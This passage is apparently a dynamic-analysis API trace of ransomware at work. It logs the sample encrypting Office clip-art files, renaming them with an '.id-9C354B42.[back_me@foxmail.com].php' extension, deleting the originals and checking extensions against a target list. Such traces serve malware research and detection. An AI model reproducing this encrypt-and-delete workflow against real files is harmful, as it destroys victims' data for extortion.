hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.276] GetLastError () returned 0x0 [0056.276] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1f20, lpOverlapped=0x0) returned 1 [0056.277] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1f30, lpOverlapped=0x0) returned 1 [0056.278] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.278] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.278] SetEndOfFile (hFile=0x204) returned 1 [0056.278] CloseHandle (hObject=0x204) returned 1 [0056.278] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.279] SetEndOfFile (hFile=0x1f0) returned 1 [0056.279] CloseHandle (hObject=0x1f0) returned 1 [0056.279] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.280] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01060_.wmf")) returned 1 [0056.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.280] lstrlenW (lpString=".doc") returned 4 [0056.280] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.280] lstrlenW (lpString=".docx") returned 5 [0056.280] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.280] lstrlenW (lpString=".pdf") returned 4 [0056.280] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.280] lstrlenW (lpString=".xls") returned 4 [0056.280] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.280] lstrlenW (lpString=".xlsx") returned 5 [0056.280] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.280] lstrlenW (lpString=".ppt") returned 4 [0056.280] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.280] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.280] lstrlenW (lpString=".zip") returned 4 [0056.280] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.280] lstrlenW (lpString=".rar") returned 4 [0056.280] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.280] lstrlenW (lpString=".bz2") returned 4 [0056.281] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.281] lstrlenW (lpString=".7z") returned 3 [0056.281] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.281] lstrlenW (lpString=".dbf") returned 4 [0056.281] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.281] lstrlenW (lpString=".1cd") returned 4 [0056.281] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.281] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01060_.WMF") returned 63 [0056.281] lstrlenW (lpString=".jpg") returned 4 [0056.281] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.281] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.281] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.281] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.282] GetLastError () returned 0x0 [0056.282] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x728, lpOverlapped=0x0) returned 1 [0056.476] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x730, lpOverlapped=0x0) returned 1 [0056.495] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.495] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.495] SetEndOfFile (hFile=0x204) returned 1 [0056.495] CloseHandle (hObject=0x204) returned 1 [0056.496] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.496] SetEndOfFile (hFile=0x1f0) returned 1 [0056.496] CloseHandle (hObject=0x1f0) returned 1 [0056.496] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.497] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0056.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.497] lstrlenW (lpString=".doc") returned 4 [0056.497] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.497] lstrlenW (lpString=".docx") returned 5 [0056.497] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.497] lstrlenW (lpString=".pdf") returned 4 [0056.497] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.497] lstrlenW (lpString=".xls") returned 4 [0056.497] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.497] lstrlenW (lpString=".xlsx") returned 5 [0056.497] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.497] lstrlenW (lpString=".ppt") returned 4 [0056.497] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.497] lstrlenW (lpString=".zip") returned 4 [0056.497] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.498] lstrlenW (lpString=".rar") returned 4 [0056.498] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString=".bz2") returned 4 [0056.498] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString=".7z") returned 3 [0056.498] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.498] lstrlenW (lpString=".dbf") returned 4 [0056.498] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.498] lstrlenW (lpString=".1cd") returned 4 [0056.498] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 63 [0056.498] lstrlenW (lpString=".jpg") returned 4 [0056.498] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.498] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.498] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.499] GetLastError () returned 0x0 [0056.499] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xd58, lpOverlapped=0x0) returned 1 [0056.500] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xd60, lpOverlapped=0x0) returned 1 [0056.501] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.501] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.501] SetEndOfFile (hFile=0x204) returned 1 [0056.501] CloseHandle (hObject=0x204) returned 1 [0056.502] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.502] SetEndOfFile (hFile=0x1f0) returned 1 [0056.502] CloseHandle (hObject=0x1f0) returned 1 [0056.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.503] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04134_.wmf")) returned 1 [0056.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.503] lstrlenW (lpString=".doc") returned 4 [0056.503] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.503] lstrlenW (lpString=".docx") returned 5 [0056.503] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.503] lstrlenW (lpString=".pdf") returned 4 [0056.503] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.503] lstrlenW (lpString=".xls") returned 4 [0056.503] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.503] lstrlenW (lpString=".xlsx") returned 5 [0056.503] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.503] lstrlenW (lpString=".ppt") returned 4 [0056.503] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.503] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.503] lstrlenW (lpString=".zip") returned 4 [0056.503] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.503] lstrlenW (lpString=".rar") returned 4 [0056.503] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.503] lstrlenW (lpString=".bz2") returned 4 [0056.503] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.504] lstrlenW (lpString=".7z") returned 3 [0056.504] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.504] lstrlenW (lpString=".dbf") returned 4 [0056.504] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.504] lstrlenW (lpString=".1cd") returned 4 [0056.504] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04134_.WMF") returned 63 [0056.504] lstrlenW (lpString=".jpg") returned 4 [0056.504] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.505] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.505] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.505] GetLastError () returned 0x0 [0056.505] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0xa4c, lpOverlapped=0x0) returned 1 [0056.507] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xa50, lpOverlapped=0x0) returned 1 [0056.507] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.508] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.508] SetEndOfFile (hFile=0x204) returned 1 [0056.508] CloseHandle (hObject=0x204) returned 1 [0056.508] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.508] SetEndOfFile (hFile=0x1f0) returned 1 [0056.509] CloseHandle (hObject=0x1f0) returned 1 [0056.509] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.509] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04174_.wmf")) returned 1 [0056.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.509] lstrlenW (lpString=".doc") returned 4 [0056.509] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.509] lstrlenW (lpString=".docx") returned 5 [0056.509] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.509] lstrlenW (lpString=".pdf") returned 4 [0056.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.509] lstrlenW (lpString=".xls") returned 4 [0056.510] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.510] lstrlenW (lpString=".xlsx") returned 5 [0056.510] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.510] lstrlenW (lpString=".ppt") returned 4 [0056.510] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.510] lstrlenW (lpString=".zip") returned 4 [0056.510] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.510] lstrlenW (lpString=".rar") returned 4 [0056.510] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.510] lstrlenW (lpString=".bz2") returned 4 [0056.510] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.510] lstrlenW (lpString=".7z") returned 3 [0056.510] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.510] lstrlenW (lpString=".dbf") returned 4 [0056.510] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.510] lstrlenW (lpString=".1cd") returned 4 [0056.510] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.510] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63 [0056.510] lstrlenW (lpString=".jpg") returned 4 [0056.510] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.511] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.511] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.511] GetLastError () returned 0x0 [0056.511] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x19ec, lpOverlapped=0x0) returned 1 [0056.512] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x19f0, lpOverlapped=0x0) returned 1 [0056.513] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.513] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.513] SetEndOfFile (hFile=0x204) returned 1 [0056.514] CloseHandle (hObject=0x204) returned 1 [0056.514] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.514] SetEndOfFile (hFile=0x1f0) returned 1 [0056.514] CloseHandle (hObject=0x1f0) returned 1 [0056.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.521] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 1 [0056.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.521] lstrlenW (lpString=".doc") returned 4 [0056.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0056.521] lstrlenW (lpString=".docx") returned 5 [0056.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0056.521] lstrlenW (lpString=".pdf") returned 4 [0056.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0056.521] lstrlenW (lpString=".xls") returned 4 [0056.522] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0056.522] lstrlenW (lpString=".xlsx") returned 5 [0056.522] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0056.522] lstrlenW (lpString=".ppt") returned 4 [0056.522] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0056.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.522] lstrlenW (lpString=".zip") returned 4 [0056.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0056.522] lstrlenW (lpString=".rar") returned 4 [0056.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0056.522] lstrlenW (lpString=".bz2") returned 4 [0056.522] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0056.522] lstrlenW (lpString=".7z") returned 3 [0056.522] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0056.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.522] lstrlenW (lpString=".dbf") returned 4 [0056.522] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0056.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.522] lstrlenW (lpString=".1cd") returned 4 [0056.522] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0056.522] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF") returned 63 [0056.522] lstrlenW (lpString=".jpg") returned 4 [0056.522] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0056.523] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.523] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.523] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04195_.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0056.523] GetLastError () returned 0x0 [0056.523] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x1204, lpOverlapped=0x0) returned 1 [0056.524] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x1210, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x1210, lpOverlapped=0x0) returned 1 [0056.525] ReadFile (in: hFile=0x1f0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.525] WriteFile (in: hFile=0x204, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.525] SetEndOfFile (hFile=0x204) returned 1 [0056.526] CloseHandle (hObject=0x204) returned 1 [0056.526] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.526] SetEndOfFile (hFile=0x1f0) returned 1 [0056.527] CloseHandle (hObject=0x1f0) returned 1 [0056.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.527] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04195_.WMF" (normalized: "c:\\program files\\microsoft 